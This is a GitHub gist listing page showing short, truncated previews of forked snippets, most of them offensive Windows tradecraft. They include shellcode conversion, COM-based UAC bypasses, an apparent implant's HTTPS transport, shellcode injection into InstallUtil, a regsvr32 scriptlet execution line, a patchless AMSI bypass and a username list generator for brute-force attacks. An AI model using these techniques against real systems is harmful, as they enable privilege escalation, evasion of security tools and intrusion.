@Yeah9782
Yeah9782 / memmem.md
Created June 12, 2022 23:44 — forked from alexx384/memmem.md
Custom implementation of memmem() for Windows and others

The implementation is based on the StackExchange question and answers, with some improvements added.

#include <stdlib.h>

void* memmem(const void* haystack, size_t haystackLen,
             const void* needle, size_t needleLen)
{
	/* The first occurrence of the empty string is deemed to occur at
Yeah9782 / shellcode_createprocess.c
Created July 11, 2022 21:26
CreateProcessA C payload converted into a shellcode payload with the help of http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
#define WIN32_LEAN_AND_MEAN
#pragma warning( disable : 4201 )
#include "GetProcAddressWithHash.h"
#include <windows.h>
#include <intrin.h>
typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
typedef BOOL(WINAPI * CREATEPROCESSA)(LPCTSTR, LPCTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
Yeah9782 / akagi_58a.c
Created July 11, 2022 21:32 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
Yeah9782 / akagi_41.c
Created July 11, 2022 21:33 — forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
Yeah9782 / akagi_42b.c
Created July 11, 2022 21:33 — forked from hfiref0x/akagi_42b.c
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
Yeah9782 / transport_https.c
Created July 24, 2022 18:15 — forked from Cracked5pider/transport_https.c
Perform HTTPS requests using WinHTTP
BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize )
{
#ifdef TRANSPORT_HTTP
HANDLE hConnect = NULL;
HANDLE hSession = NULL;
HANDLE hRequest = NULL;
DWORD HttpFlags = 0;
LPVOID RespBuffer = NULL;
Yeah9782 / rwxHunter.cs
Created August 14, 2022 23:12 — forked from nicholasmckinney/rwxHunter.cs
Locate an RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtualAlloc Call
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Yeah9782 / example.sct
Created August 14, 2022 23:12 — forked from nicholasmckinney/example.sct
SCT File Obfuscation Examples:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
Yeah9782 / patchless_amsi.h
Created August 19, 2022 16:26 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
Yeah9782 / namemash.py
Created June 1, 2023 12:46 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''